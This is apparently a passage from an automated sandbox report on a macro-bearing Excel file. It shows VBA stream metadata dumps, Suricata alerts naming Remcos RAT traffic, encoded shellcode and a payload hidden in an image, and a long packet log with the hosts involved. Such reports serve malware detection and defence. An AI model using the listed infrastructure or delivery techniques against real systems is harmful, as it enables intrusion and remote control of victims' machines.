Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . & O & ) P { \\ n # p ' L . G l 9 . $ . U h 8 W r . 2 H V . . . . . . . . . / V . . . \\ . p . , y G M . . S . . 5 @ \| . ' . B 8 n g A O . a K E U g K 6 . r . . . 6 E { ; K U . . # . t B " . G x 9 ; . @ . . : 6 B . . . V . a . . . J . . . = . . . K . 1 . . . , V . C . E . ! B x ? . . . j . . . . . . . . . . . . . . . . . J . . . . J = . . . . % d & . s @ . . . . . . . . . " . . . 6 . . . . . . . . . . . C . 1 . . . s . V S . 8 . N . . = b y P B q 1
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 9c 1b c5 96 0e 9d 26 4f 26 29 50 7b 5c eb e4 6e dd 23 70 27 4c e1 0c b5 c1 47 6c 39 15 24 2e 86 ee 55 68 fe f9 38 57 72 04 cb 32 84 48 56 1a 0a e1 00 02 00 b0 04 c1 00 02 00 2f 56 e2 00 00 00 5c 00 70 00 2c 79 e3 c9 47 ad fd e8 ed 4d 10 1b 53 dc 83 a1 db d5 b4 35 9b 40 d5 7c aa 1a ae 27 f9 f7

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	527
Entropy:	5.267697040600723
Base64 Encoded:	True
Data ASCII:	I D = " { 7 1 E D 4 7 2 5 - F 7 9 B - 4 3 3 4 - B B 7 3 - E F 7 0 B 1 1 7 2 C 7 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 6 7 4 A 9 1 0 A F 1 0 F 6 1 4 F
Data Raw:	49 44 3d 22 7b 37 31 45 44 34 37 32 35 2d 46 37 39 42 2d 34 33 33 34 2d 42 42 37 33 2d 45 46 37 30 42 31 31 37 32 43 37 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9926581809209103
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.385269973977492
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 7 h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bd 37 b4 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T13:02:47.672740+0200	TCP	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	80	49177	198.46.176.133	192.168.2.22
2024-07-26T13:03:09.015072+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	49189	93.113.54.56	192.168.2.22
2024-07-26T13:02:55.651850+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49186	80	192.168.2.22	178.237.33.50
2024-07-26T13:02:48.698318+0200	TCP	2020424	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1	80	49181	104.168.45.34	192.168.2.22
2024-07-26T13:05:19.248660+0200	TCP	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	57484	49183	192.253.251.227	192.168.2.22
2024-07-26T13:02:46.699400+0200	TCP	2047750	ET MALWARE Base64 Encoded MZ In Image	80	49177	198.46.176.133	192.168.2.22
2024-07-26T13:02:52.137398+0200	TCP	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	49183	57484	192.168.2.22	192.253.251.227
2024-07-26T13:03:08.898096+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49189	443	192.168.2.22	93.113.54.56
2024-07-26T13:03:03.332218+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	49188	93.113.54.56	192.168.2.22
2024-07-26T13:02:53.848289+0200	TCP	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	57484	49183	192.253.251.227	192.168.2.22
2024-07-26T13:07:19.804539+0200	TCP	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	57484	49183	192.253.251.227	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 13:02:24.401525021 CEST	49161	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.407419920 CEST	80	49161	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:24.407586098 CEST	49161	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.407691002 CEST	49161	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.412682056 CEST	80	49161	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:24.886981010 CEST	80	49161	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:24.887190104 CEST	49161	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.917949915 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.918003082 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:24.918061972 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.938138962 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:24.938162088 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:25.437263012 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:25.437334061 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:25.444176912 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:25.444188118 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:25.444693089 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:25.444742918 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:25.585001945 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:25.628503084 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:26.664984941 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:26.665071011 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:26.665118933 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:26.665941000 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:26.665941000 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:26.683947086 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:26.688909054 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:26.688990116 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:26.689064026 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:26.693953037 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:26.964181900 CEST	49162	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:26.964238882 CEST	443	49162	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:27.204163074 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204186916 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204226971 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204243898 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204258919 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204273939 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204289913 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204407930 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.204858065 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204873085 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204890013 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.204905987 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.204922915 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.204935074 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.209261894 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.209316969 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.209603071 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.209649086 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.212919950 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.295728922 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.295814991 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.295829058 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.295840025 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.295902967 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.295983076 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296005964 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296020985 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296020985 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296046019 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296197891 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296215057 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296240091 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296240091 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296701908 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296736956 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296854019 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296869040 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.296890020 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.296900988 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297014952 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297054052 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297305107 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297339916 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297467947 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297503948 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297563076 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297579050 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297606945 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297606945 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297794104 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297808886 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.297832012 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.297842979 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.298299074 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.298353910 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.298387051 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.298402071 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.298420906 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.298429966 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.298616886 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.298652887 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.300960064 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.300996065 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.301053047 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.301090002 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.387792110 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.387816906 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.387831926 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.387886047 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.387909889 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.387926102 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.387932062 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.387950897 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.387958050 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388210058 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388225079 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388240099 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388246059 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388254881 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388263941 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388274908 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388276100 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388303041 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388444901 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388787985 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388803959 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388818979 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388823032 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388834000 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388842106 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388849974 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.388856888 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388865948 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.388887882 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389368057 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389381886 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389398098 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389405966 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389411926 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389417887 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389427900 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389436007 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389444113 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.389452934 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389457941 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.389478922 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390050888 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390068054 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390083075 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390089989 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390099049 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390115023 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390248060 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390248060 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390248060 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390248060 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390551090 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390592098 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390762091 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390777111 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390791893 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390799999 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390806913 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390810013 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390822887 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390827894 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390836954 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390840054 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390852928 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.390856981 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390868902 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.390886068 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.391455889 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.391494989 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.392863035 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:27.392906904 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.576248884 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:27.722198963 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:27.728324890 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:27.728415966 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:27.728749990 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:27.733951092 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.223129034 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.223297119 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.465903044 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.470881939 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.570208073 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.570406914 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.579711914 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.584661007 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.682288885 CEST	80	49164	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.682478905 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.777143002 CEST	49165	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.792191029 CEST	80	49165	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:28.792378902 CEST	49165	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.792927027 CEST	49165	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:28.799325943 CEST	80	49165	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.295759916 CEST	80	49165	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.298494101 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.298531055 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.298612118 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.299408913 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.299421072 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.506656885 CEST	80	49165	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.506732941 CEST	49165	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.787661076 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.787735939 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.791353941 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.791369915 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.791645050 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:29.855391979 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:29.896507025 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:30.096096992 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:30.096160889 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:30.096220970 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:30.096298933 CEST	49166	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:30.096338034 CEST	443	49166	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:30.124097109 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.124136925 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.124182940 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.124802113 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.124811888 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.587083101 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.587249994 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.590029001 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.590046883 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.590295076 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.591953039 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.636523008 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.734061956 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.734581947 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:30.734786987 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.734786987 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.734786987 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:30.734786987 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:31.035887003 CEST	49167	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:31.035936117 CEST	443	49167	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:32.216398001 CEST	80	49163	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:32.216546059 CEST	49163	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:33.924590111 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:33.929466009 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:33.929522038 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:33.929651022 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:33.934499979 CEST	80	49168	188.114.96.3	192.168.2.22
